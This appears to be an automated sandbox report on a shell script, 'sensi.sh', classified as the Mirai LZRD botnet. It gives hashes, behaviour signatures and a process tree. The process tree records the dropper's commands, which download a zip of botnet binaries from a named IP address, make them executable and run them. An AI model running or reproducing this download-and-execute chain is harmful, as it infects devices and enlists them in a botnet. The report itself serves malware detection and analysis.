Overview

overview

10

Static

static

1

sensi.sh

ubuntu-18.04-amd64

10

sensi.sh

debian-9-armhf

3

sensi.sh

debian-9-mips

7

sensi.sh

debian-9-mipsel

7

Analysis

  • max time kernel
    140s
  • max time network
    149s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    26-12-2024 14:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sensi.sh

  • Size

    616B

  • MD5

    16a80dae144d0b28b41b1bc690560eb4

  • SHA1

    f5656969be23544e08a5b6dc59444ad8d9f4075a

  • SHA256

    58d5bc84e8dcfd88e55fb4408562e6e091a6fdc30698b94a91ce0c48fdce8770

  • SHA512

    3e04f1b5d9aea830e52e9a619bfc4f5fffca455268b1379fd22ccd5ede4e8693510db2054f68fdf21cc8ab4c183db274a3ad87f54be84b42f32616aba6f55a96

Score
10/10
mirailzrdbotnetdefense_evasiondiscoveryupx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (20206) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Enumerates kernel/hardware configuration 1 TTPs 4 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 28 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sensi.sh
    /tmp/sensi.sh
    1⤵
      PID:1510
      • /usr/bin/apt
        apt install -y wget unzip
        2⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1511
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
            PID:1512
          • /usr/bin/dpkg
            /usr/bin/dpkg --print-foreign-architectures
            3⤵
              PID:1513
            • /bin/sh
              /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
              3⤵
                PID:1517
                • /usr/bin/snap
                  /usr/bin/snap advise-snap --from-apt
                  4⤵
                  • Enumerates kernel/hardware configuration
                  • Reads runtime system information
                  PID:1518
              • /bin/sh
                /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                3⤵
                  PID:1526
                  • /usr/bin/snap
                    /usr/bin/snap advise-snap --from-apt
                    4⤵
                    • Enumerates kernel/hardware configuration
                    PID:1527
                • /bin/sh
                  /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                  3⤵
                    PID:1535
                    • /usr/bin/snap
                      /usr/bin/snap advise-snap --from-apt
                      4⤵
                      • Enumerates kernel/hardware configuration
                      PID:1536
                  • /bin/sh
                    /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                    3⤵
                      PID:1544
                      • /usr/bin/snap
                        /usr/bin/snap advise-snap --from-apt
                        4⤵
                        • Enumerates kernel/hardware configuration
                        PID:1545
                  • /usr/bin/wget
                    wget http://107.150.62.186/d.zip
                    2⤵
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:1553
                  • /usr/bin/unzip
                    unzip d.zip
                    2⤵
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:1554
                  • /bin/chmod
                    chmod +x xd.arm xd.arm5 xd.arm6 xd.arm7 xd.m68k xd.mips xd.mpsl xd.ppc xd.sh4 xd.spc xd.x86
                    2⤵
                    • File and Directory Permissions Modification
                    PID:1555
                  • /tmp/d/xd.x86
                    ./xd.x86
                    2⤵
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Reads system network configuration
                    • Reads runtime system information
                    PID:1556
                  • /tmp/d/xd.mips
                    ./xd.mips
                    2⤵
                    • System Network Configuration Discovery
                    PID:1560

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/d.zip
                  Filesize

                  349KB

                  MD5

                  9df87e61955d14d79c4dc948cbdcfb4b

                  SHA1

                  c0447a1a37c7f8ce24e6fb9919221a4d89a0dc74

                  SHA256

                  5d45fb31f1e8db1be7decb957041eb0a12802ce9a95e7fcc19d1794cea1b8d0a

                  SHA512

                  f6c96d88f80961d9036fea24d5d765c14ec573ca946d19e255a66d13b803f3e3c96c956a7daf65ee04b48b0f302817c85aaa3e45fd8930dc7b163f6f070a3bda

                  Download Submit

                • /tmp/d/xd.arm6
                  Filesize

                  33KB

                  MD5

                  5e15e25f22fc8090e7b02fb87845ae61

                  SHA1

                  115eace8a1131084fc9303ad4da2ad1ed2366125

                  SHA256

                  202a3205d0b9965e89fd62467165b82fca3e1932eec1b85b10bf9e2959098b23

                  SHA512

                  b760c1b1e60df0f6898af8304f433c1e619adafbe74d88815b1bf1c6749f0fd3754ef01d48e28e06a04b84db1755d94ab3f8e4871b9a8b4688510c8df6a145ec

                  Download Submit

                • /tmp/fileutl.message.iFSjtT
                  Filesize

                  235KB

                  MD5

                  373fe2f2ef99005d2550a482f09a3e51

                  SHA1

                  68e6572b55b1e77f7d171ebac7b2579b7a6bd51d

                  SHA256

                  7552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5

                  SHA512

                  def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b

                  Download Submit